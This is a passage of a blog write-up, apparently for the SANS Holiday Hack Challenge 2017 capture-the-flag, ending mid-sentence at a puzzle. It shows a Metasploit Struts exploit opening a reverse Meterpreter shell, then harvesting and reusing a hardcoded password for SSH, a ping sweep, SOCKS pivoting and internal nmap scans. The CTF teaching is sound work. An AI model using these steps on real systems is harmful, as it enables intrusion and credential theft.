    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;description&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;North Pole Letters to Santa&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;keywords&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;North,Pole,Letters,Santa,toy,request&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;author&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;Alabaster Snowball&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
[...]
    &lt;span class="c"&gt;&amp;lt;!-- Development version --&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt; &lt;span class="na"&gt;href&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;http://dev.northpolechristmastown.com&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;display: none;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Access Development Version&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There seems to be a hidden link, to a development version of the application:&lt;/p&gt;
&lt;img alt="dev_toy_index.png" class="align-center" src="/images/sans-christmas-challenge-2017/dev_toy_index.png" /&gt;
&lt;p&gt;Users can manually request toys:&lt;/p&gt;
&lt;img alt="dev_toy_request.png" class="align-center" src="/images/sans-christmas-challenge-2017/dev_toy_request.png" /&gt;
&lt;p&gt;Did you notice something interesting in the above screenshots? Let's take a
closer look:&lt;/p&gt;
&lt;img alt="dev_toy_struts.png" class="align-center" src="/images/sans-christmas-challenge-2017/dev_toy_struts.png" /&gt;
&lt;p&gt;This server is using Apache Struts as the application framework! Many of you
know that Struts was affected by a &lt;a class="reference external" href="https://cwiki.apache.org/confluence/display/WW/S2-052"&gt;pretty serious vulnerability&lt;/a&gt;
this year, which leads to unauthenticated remote code execution.&lt;/p&gt;
&lt;p&gt;Let's use our &lt;a class="reference external" href="https://github.com/rapid7/metasploit-framework"&gt;favorite exploitation framework&lt;/a&gt;
to get a shell on this webserver. I installed Metasploit on a public-facing
server of mine. SANS helpfully &lt;a class="reference external" href="https://pen-testing.sans.org/blog/2017/12/10/putting-my-zero-cents-in-using-the-free-tier-on-amazon-web-services-ec2"&gt;posted instructions&lt;/a&gt;
on how to register to the free-tier AWS offers if you don't already have a
public-facing server.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;msf exploit(multi/http/struts2_rest_xstream) &amp;gt; options&lt;/span&gt;

&lt;span class="go"&gt;Module options (exploit/multi/http/struts2_rest_xstream):&lt;/span&gt;

&lt;span class="go"&gt;   Name       Current Setting                 Required  Description&lt;/span&gt;
&lt;span class="go"&gt;   ----       ---------------                 --------  -----------&lt;/span&gt;
&lt;span class="go"&gt;   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]&lt;/span&gt;
&lt;span class="go"&gt;   RHOST      dev.northpolechristmastown.com  yes       The target address&lt;/span&gt;
&lt;span class="go"&gt;   RPORT      443                             yes       The target port (TCP)&lt;/span&gt;
&lt;span class="go"&gt;   SRVHOST    0.0.0.0                         yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0&lt;/span&gt;
&lt;span class="go"&gt;   SRVPORT    80                              yes       The local port to listen on.&lt;/span&gt;
&lt;span class="go"&gt;   SSL        true                            no        Negotiate SSL/TLS for outgoing connections&lt;/span&gt;
&lt;span class="go"&gt;   SSLCert                                    no        Path to a custom SSL certificate (default is randomly generated)&lt;/span&gt;
&lt;span class="go"&gt;   TARGETURI  /orders/3043                    yes       Path to Struts action&lt;/span&gt;
&lt;span class="go"&gt;   URIPATH                                    no        The URI to use for this exploit (default is random)&lt;/span&gt;
&lt;span class="go"&gt;   VHOST                                      no        HTTP server virtual host&lt;/span&gt;


&lt;span class="go"&gt;Payload options (python/meterpreter/reverse_https):&lt;/span&gt;

&lt;span class="go"&gt;   Name   Current Setting        Required  Description&lt;/span&gt;
&lt;span class="go"&gt;   ----   ---------------        --------  -----------&lt;/span&gt;
&lt;span class="go"&gt;   LHOST  X.X.X.X                yes       The local listener hostname&lt;/span&gt;
&lt;span class="go"&gt;   LPORT  443                    yes       The local listener port&lt;/span&gt;
&lt;span class="go"&gt;   LURI                          no        The HTTP Path&lt;/span&gt;


&lt;span class="go"&gt;Exploit target:&lt;/span&gt;

&lt;span class="go"&gt;   Id  Name&lt;/span&gt;
&lt;span class="go"&gt;   --  ----&lt;/span&gt;
&lt;span class="go"&gt;   1   Python (In-Memory)&lt;/span&gt;


&lt;span class="go"&gt;msf exploit(multi/http/struts2_rest_xstream) &amp;gt; exploit&lt;/span&gt;

&lt;span class="go"&gt;[-] Handler failed to bind to 163.172.50.13:443&lt;/span&gt;
&lt;span class="go"&gt;[*] Started HTTPS reverse handler on https://0.0.0.0:443&lt;/span&gt;
&lt;span class="go"&gt;[*] https://X.X.X.X:443 handling request from X.X.X.X; (UUID: oqqwyeik) Staging python payload (43883 bytes) ...&lt;/span&gt;
&lt;span class="go"&gt;[*] Meterpreter session 1 opened (Y.Y.Y.Y:443 -&amp;gt; X.X.X.X:50354) at 2017-12-24 16:56:24 +0100&lt;/span&gt;

&lt;span class="go"&gt;meterpreter &amp;gt; getuid&lt;/span&gt;
&lt;span class="go"&gt;Server username: alabaster_snowball&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we have a Meterpreter shell on the server!&lt;/p&gt;
&lt;img alt="l2s_meterpreter.gif" class="align-center" src="/images/sans-christmas-challenge-2017/l2s_meterpreter.gif" /&gt;
&lt;p&gt;Let's take a look at &lt;code&gt;/var/www/html&lt;/code&gt;, which is the web root according to
the nginx configuration file found on the server:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;meterpreter &amp;gt; ls -l /var/www/html/*.pdf&lt;/span&gt;
&lt;span class="go"&gt;Listing: /var/www/html/*.pdf&lt;/span&gt;
&lt;span class="go"&gt;============================&lt;/span&gt;

&lt;span class="go"&gt;Mode              Size     Type  Last modified              Name&lt;/span&gt;
&lt;span class="go"&gt;----              ----     ----  -------------              ----&lt;/span&gt;
&lt;span class="go"&gt;100444/r--r--r--  1764298  fil   2017-12-05 18:27:15 +0100  GreatBookPage2.pdf&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We see our second page, which we found earlier via forceful browsing. So even
if the name had not been predictable, we would have been able to find this
page.&lt;/p&gt;
&lt;p&gt;Now, the goal is to find Alabaster Snowball's password. I first tried to
escalate my privileges on the server, in order to get access to the
&lt;code&gt;/etc/shadow&lt;/code&gt; file, but I didn't succeed. So, let's find another way.&lt;/p&gt;
&lt;p&gt;Let's take a look at listening sockets:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;meterpreter &amp;gt; shell&lt;/span&gt;
&lt;span class="go"&gt;Process 20555 created.&lt;/span&gt;
&lt;span class="go"&gt;Channel 7 created.&lt;/span&gt;
&lt;span class="go"&gt;/bin/sh: 0: can&amp;#39;t access tty; job control turned off&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; netstat -tlpn
&lt;span class="go"&gt;(Not all processes could be identified, non-owned process info&lt;/span&gt;
&lt;span class="go"&gt; will not be shown, you would have to be root to see it all.)&lt;/span&gt;
&lt;span class="go"&gt;Active Internet connections (only servers)&lt;/span&gt;
&lt;span class="go"&gt;Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name&lt;/span&gt;
&lt;span class="go"&gt;tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -&lt;/span&gt;
&lt;span class="go"&gt;tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -&lt;/span&gt;
&lt;span class="go"&gt;tcp        6      0 0.0.0.0:9000            0.0.0.0:*               LISTEN      11043/python&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;tcp6       0      0 127.0.0.1:8080          :::*                    LISTEN      790/java&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;tcp6       0      0 :::22                   :::*                    LISTEN      -&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      790/java&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that our user is running a Java program, with the PID 790. Let's
get details on this process:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ps aux &lt;span class="p"&gt;|&lt;/span&gt; grep -w &lt;span class="m"&gt;790&lt;/span&gt;
&lt;span class="go"&gt;alabast+   790  5.0  2.0 939444 630656 ?       Sl   03:01  43:43 /opt/jre/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Dfile.encoding=UTF-8 -Dnet.sf.ehcache.skipUpdateCheck=true -XX:+UseConcMarkSweepGC -XX:+CMSClassUnloadingEnabled -XX:+UseParNewGC -XX:MaxPermSize=128m -Xms512m -Xmx512m -Djava.endorsed.dirs=/opt/apache-tomcat/endorsed -classpath /opt/apache-tomcat/bin/bootstrap.jar -Dcatalina.base=/opt/apache-tomcat -Dcatalina.home=/opt/apache-tomcat -Djava.io.tmpdir=/opt/apache-tomcat/temp org.apache.catalina.startup.Bootstrap start&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Our user is running the Apache Tomcat server. The different Java resources
seem to be installed in &lt;code&gt;/opt&lt;/code&gt;. Let's take a look at the files there.
There may indeed be configuration files containing our current user's password:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -A &lt;span class="m"&gt;1&lt;/span&gt; -Rn alabaster_snowball /opt
&lt;span class="go"&gt;/opt/apache-tomcat/webapps/ROOT/WEB-INF/classes/org/demo/rest/example/OrderMySql.class:3:            final String username = &amp;quot;alabaster_snowball&amp;quot;;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;/opt/apache-tomcat/webapps/ROOT/WEB-INF/classes/org/demo/rest/example/OrderMySql.class-4-            final String password = &amp;quot;stream_unhappy_buy_loss&amp;quot;;&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Bingo, we got a password for our user, but it seems to be for a MySQL
connection. Let's see if our user used the same password for their system
password. Our pwned server has an SSH server accessible from the Internet:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; nmap -p &lt;span class="m"&gt;22&lt;/span&gt; dev.northpolechristmastown.com

&lt;span class="go"&gt;Starting Nmap 7.40 ( https://nmap.org ) at 2017-12-24 18:40 CET&lt;/span&gt;
&lt;span class="go"&gt;Nmap scan report for dev.northpolechristmastown.com (35.185.84.51)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.18s latency).&lt;/span&gt;
&lt;span class="go"&gt;rDNS record for 35.185.84.51: 51.84.185.35.bc.googleusercontent.com&lt;/span&gt;
&lt;span class="go"&gt;PORT   STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;22/tcp open  ssh&lt;/span&gt;

&lt;span class="go"&gt;Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; ssh alabaster_snowball@dev.northpolechristmastown.com
&lt;span class="go"&gt;alabaster_snowball@dev.northpolechristmastown.com&amp;#39;s password: stream_unhappy_buy_loss&lt;/span&gt;
&lt;span class="gp"&gt;alabaster_snowball@hhc17-apache-struts1:/tmp/asnow.FcLiqpWNISKoESUcwo5Jip8O$&lt;/span&gt; hostname
&lt;span class="go"&gt;hhc17-apache-struts1&lt;/span&gt;
&lt;span class="gp"&gt;alabaster_snowball@hhc17-apache-struts1:/tmp/asnow.FcLiqpWNISKoESUcwo5Jip8O$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright! The password &lt;code&gt;stream_unhappy_buy_loss&lt;/code&gt; also works for the
system account. Let's the internal IP address of the system:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ifconfig eth0
&lt;span class="go"&gt;eth0: flags=4163&amp;lt;UP,BROADCAST,RUNNING,MULTICAST&amp;gt;  mtu 1460&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;        inet 10.142.0.3  netmask 255.255.255.255  broadcast 10.142.0.3&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;        ether 42:01:0a:8e:00:03  txqueuelen 1000  (Ethernet)&lt;/span&gt;
&lt;span class="go"&gt;        RX packets 4837274  bytes 1254973259 (1.1 GiB)&lt;/span&gt;
&lt;span class="go"&gt;        RX errors 0  dropped 0  overruns 0  frame 4&lt;/span&gt;
&lt;span class="go"&gt;        TX packets 11266245  bytes 3876810300 (3.6 GiB)&lt;/span&gt;
&lt;span class="go"&gt;        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we have access to the 10.142.0.0/24 network, which is in scope! Let's
what IP addresses are up. For this I use a custom one-liner, launched directly
on the machine:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nv"&gt;prefix&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="m"&gt;10&lt;/span&gt;.142.0&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; i in &lt;span class="sb"&gt;`&lt;/span&gt;seq &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="m"&gt;254&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt; ping -c &lt;span class="m"&gt;1&lt;/span&gt; -W &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="nv"&gt;$prefix&lt;/span&gt;.&lt;span class="nv"&gt;$i&lt;/span&gt; &amp;gt; /dev/null &lt;span class="m"&gt;2&lt;/span&gt;&amp;gt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="nv"&gt;$prefix&lt;/span&gt;&lt;span class="s2"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;$i&lt;/span&gt;&lt;span class="s2"&gt; is up&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;
&lt;span class="go"&gt;10.142.0.2 is up&lt;/span&gt;
&lt;span class="go"&gt;10.142.0.3 is up&lt;/span&gt;
&lt;span class="go"&gt;10.142.0.5 is up&lt;/span&gt;
&lt;span class="go"&gt;10.142.0.6 is up&lt;/span&gt;
&lt;span class="go"&gt;10.142.0.7 is up&lt;/span&gt;
&lt;span class="go"&gt;10.142.0.8 is up&lt;/span&gt;
&lt;span class="go"&gt;10.142.0.11 is up&lt;/span&gt;
&lt;span class="go"&gt;10.142.0.13 is up&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now that we know which IPs are up, let's perform a port scan. Luckily,
&lt;code&gt;nmap&lt;/code&gt; is installed on the server, so we can use it. But let's say that
&lt;code&gt;nmap&lt;/code&gt; isn't installed on the machine: in a real world example, this
would most likely be the case, and that's how I did it (it didn't even cross
my mind that &lt;code&gt;nmap&lt;/code&gt; could be installed, and I just checked when writing
this write-up).&lt;/p&gt;
&lt;p&gt;Now that we have valid SSH credentials, we can create a SOCKS proxy using the
&lt;code&gt;-D&lt;/code&gt; option. We can then use a tool like &lt;code&gt;proxychains&lt;/code&gt; to redirect
our different tools through our SOCKS proxy:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="c1"&gt;# in one terminal&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; ssh -D &lt;span class="m"&gt;4242&lt;/span&gt; alabaster_snowball@dev.northpolechristmastown.com
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="c1"&gt;# in another terminal&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; tail -n &lt;span class="m"&gt;6&lt;/span&gt; /etc/proxychains.conf
&lt;span class="go"&gt;[ProxyList]&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt; add proxy here ...
&lt;span class="gp"&gt;#&lt;/span&gt; meanwile
&lt;span class="gp"&gt;#&lt;/span&gt; defaults &lt;span class="nb"&gt;set&lt;/span&gt; to &lt;span class="s2"&gt;&amp;quot;tor&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;socks4     127.0.0.1 4242 # modify here in your configuration file&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; proxychains nmap -sT -Pn --top-port &lt;span class="m"&gt;10&lt;/span&gt; --open -iL ./up_ips.txt
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now you may notice that I just scanned the top 10 TCP ports. Indeed, scanning
port through a SOCKS proxy can take quite some time, because of the overhead,
so most of the time I just bother to scan the top 10 TCP ports.&lt;/p&gt;
&lt;p&gt;Now, since &lt;code&gt;nmap&lt;/code&gt; is installed on our compromised machine, let's do a
more thorough scan, directly from the &lt;code&gt;hhc17-apache-struts1&lt;/code&gt; machine:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; nmap --open &lt;span class="m"&gt;10&lt;/span&gt;.142.0.0/24 -oA tcp_top_1000_10.142.0.0.24

&lt;span class="go"&gt;Starting Nmap 7.40 ( https://nmap.org ) at 2017-12-25 23:04 UTC&lt;/span&gt;
&lt;span class="go"&gt;Nmap scan report for hhc17-l2s-proxy.c.holidayhack2017.internal (10.142.0.2)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.00021s latency).&lt;/span&gt;
&lt;span class="go"&gt;Not shown: 996 closed ports&lt;/span&gt;
&lt;span class="go"&gt;Some closed ports may be reported as filtered due to --defeat-rst-ratelimit&lt;/span&gt;
&lt;span class="go"&gt;PORT     STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;22/tcp   open  ssh&lt;/span&gt;
&lt;span class="go"&gt;80/tcp   open  http&lt;/span&gt;
&lt;span class="go"&gt;443/tcp  open  https&lt;/span&gt;
&lt;span class="go"&gt;2222/tcp open  EtherNetIP-1&lt;/span&gt;

&lt;span class="go"&gt;Nmap scan report for hhc17-apache-struts1.c.holidayhack2017.internal (10.142.0.3)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.00021s latency).&lt;/span&gt;
&lt;span class="go"&gt;Not shown: 998 closed ports&lt;/span&gt;
&lt;span class="go"&gt;Some closed ports may be reported as filtered due to --defeat-rst-ratelimit&lt;/span&gt;
&lt;span class="go"&gt;PORT   STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;22/tcp open  ssh&lt;/span&gt;
&lt;span class="go"&gt;80/tcp open  http&lt;/span&gt;

&lt;span class="go"&gt;Nmap scan report for mail.northpolechristmastown.com (10.142.0.5)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.00016s latency).&lt;/span&gt;
&lt;span class="go"&gt;Not shown: 994 closed ports&lt;/span&gt;
&lt;span class="go"&gt;Some closed ports may be reported as filtered due to --defeat-rst-ratelimit&lt;/span&gt;
&lt;span class="go"&gt;PORT     STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;22/tcp   open  ssh&lt;/span&gt;
&lt;span class="go"&gt;25/tcp   open  smtp&lt;/span&gt;
&lt;span class="go"&gt;80/tcp   open  http&lt;/span&gt;
&lt;span class="go"&gt;143/tcp  open  imap&lt;/span&gt;
&lt;span class="go"&gt;2525/tcp open  ms-v-worlds&lt;/span&gt;
&lt;span class="go"&gt;3000/tcp open  ppp&lt;/span&gt;

&lt;span class="go"&gt;Nmap scan report for edb.northpolechristmastown.com (10.142.0.6)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.00013s latency).&lt;/span&gt;
&lt;span class="go"&gt;Not shown: 996 closed ports&lt;/span&gt;
&lt;span class="go"&gt;Some closed ports may be reported as filtered due to --defeat-rst-ratelimit&lt;/span&gt;
&lt;span class="go"&gt;PORT     STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;22/tcp   open  ssh&lt;/span&gt;
&lt;span class="go"&gt;80/tcp   open  http&lt;/span&gt;
&lt;span class="go"&gt;389/tcp  open  ldap&lt;/span&gt;
&lt;span class="go"&gt;8080/tcp open  http-proxy&lt;/span&gt;

&lt;span class="go"&gt;Nmap scan report for hhc17-smb-server.c.holidayhack2017.internal (10.142.0.7)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.00052s latency).&lt;/span&gt;
&lt;span class="go"&gt;Not shown: 996 filtered ports&lt;/span&gt;
&lt;span class="go"&gt;PORT     STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;135/tcp  open  msrpc&lt;/span&gt;
&lt;span class="go"&gt;139/tcp  open  netbios-ssn&lt;/span&gt;
&lt;span class="go"&gt;445/tcp  open  microsoft-ds&lt;/span&gt;
&lt;span class="go"&gt;3389/tcp open  ms-wbt-server&lt;/span&gt;

&lt;span class="go"&gt;Nmap scan report for hhc17-emi.c.holidayhack2017.internal (10.142.0.8)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.00018s latency).&lt;/span&gt;
&lt;span class="go"&gt;Not shown: 960 closed ports, 35 filtered ports&lt;/span&gt;
&lt;span class="go"&gt;Some closed ports may be reported as filtered due to --defeat-rst-ratelimit&lt;/span&gt;
&lt;span class="go"&gt;PORT     STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;80/tcp   open  http&lt;/span&gt;
&lt;span class="go"&gt;135/tcp  open  msrpc&lt;/span&gt;
&lt;span class="go"&gt;139/tcp  open  netbios-ssn&lt;/span&gt;
&lt;span class="go"&gt;445/tcp  open  microsoft-ds&lt;/span&gt;
&lt;span class="go"&gt;3389/tcp open  ms-wbt-server&lt;/span&gt;

&lt;span class="go"&gt;Nmap scan report for hhc17-apache-struts2.c.holidayhack2017.internal (10.142.0.11)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.00023s latency).&lt;/span&gt;
&lt;span class="go"&gt;Not shown: 996 closed ports&lt;/span&gt;
&lt;span class="go"&gt;Some closed ports may be reported as filtered due to --defeat-rst-ratelimit&lt;/span&gt;
&lt;span class="go"&gt;PORT     STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;22/tcp   open  ssh&lt;/span&gt;
&lt;span class="go"&gt;80/tcp   open  http&lt;/span&gt;
&lt;span class="go"&gt;4443/tcp open  pharos&lt;/span&gt;
&lt;span class="go"&gt;9090/tcp open  zeus-admin&lt;/span&gt;

&lt;span class="go"&gt;Nmap scan report for eaas.northpolechristmastown.com (10.142.0.13)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.0045s latency).&lt;/span&gt;
&lt;span class="go"&gt;Not shown: 998 filtered ports&lt;/span&gt;
&lt;span class="go"&gt;Some closed ports may be reported as filtered due to --defeat-rst-ratelimit&lt;/span&gt;
&lt;span class="go"&gt;PORT     STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;80/tcp   open  http&lt;/span&gt;
&lt;span class="go"&gt;3389/tcp open  ms-wbt-server&lt;/span&gt;

&lt;span class="go"&gt;Nmap done: 256 IP addresses (7 hosts up) scanned in 7.17 seconds&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have a better view of the internal network.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="third-page-of-the-great-book"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id28"&gt;Third page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="north-pole-and-beyond-cryokinetic-magic"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id29"&gt;North Pole and Beyond: Cryokinetic Magic&lt;/a&gt;&lt;/h3&gt;
&lt;div class="section" id="id4"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id30"&gt;Cranberry Pi: Yannick's (dirty) solution&lt;/a&gt;&lt;/h4&gt;
&lt;pre class="literal-block"&gt;
                     ___
                    / __'.     .-&amp;quot;&amp;quot;&amp;quot;-.
              .-&amp;quot;&amp;quot;-| |  '.'.  / .---. \
             / .--. \ \___\ \/ /____| |
            / /    \ `-.-;-(`_)_____.-'._
           ; ;      `.-&amp;quot; &amp;quot;-:_,(o:==..`-. '.         .-&amp;quot;-,
           | |      /       \ /      `\ `. \       / .-. \
           \ \     |         Y    __...\  \ \     / /   \/
     /\     | |    | .--&amp;quot;&amp;quot;--.| .-'      \  '.`---' /
     \ \   / /     |`        \'   _...--.;   '---'`
      \ '-' / jgs  /_..---.._ \ .'\\_     `.
       `--'`      .'    (_)  `'/   (_)     /
                  `._       _.'|         .'
                     ```````    '-...--'`
My name is Holly Evergreen, and I have a conundrum.
I broke the candy cane striper, and I'm near throwing a tantrum.
Assembly lines have stopped since the elves can't get their candy cane fix.
We hope you can start the striper once again, with your vast bag of tricks.

Run the CandyCaneStriper executable to complete this challenge.
&lt;/pre&gt;
&lt;p&gt;Ok, so we just have to execute the &lt;code&gt;CandyCaneStripper&lt;/code&gt; executable, let's
take a look at it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@cd14b3563680:~$&lt;/span&gt; ls -lh
&lt;span class="go"&gt;total 48K&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 root root 45K Dec 15 19:59 CandyCaneStriper&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;CandyCaneStripper&lt;/code&gt; file is &lt;strong&gt;not&lt;/strong&gt; marked as executable. So we can't
launch it. Let's &lt;code&gt;chmod&lt;/code&gt; it to add the executable flag:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@cd14b3563680:~$&lt;/span&gt; chmod +x ./CandyCaneStriper
&lt;span class="gp"&gt;elf@cd14b3563680:~$&lt;/span&gt; ls -lh CandyCaneStriper
&lt;span class="go"&gt;-rw-r--r-- 1 root root 45K Dec 15 19:59 CandyCaneStriper&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, it didn't work. Let's take a look at the &lt;code&gt;chmod&lt;/code&gt; executable:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@cd14b3563680:~$&lt;/span&gt; which chmod
&lt;span class="go"&gt;/bin/chmod&lt;/span&gt;
&lt;span class="gp"&gt;elf@cd14b3563680:~$&lt;/span&gt; file /bin/chmod
&lt;span class="go"&gt;/bin/chmod: empty&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;chmod&lt;/code&gt; executable is empty, so we don't have it. We can't use the
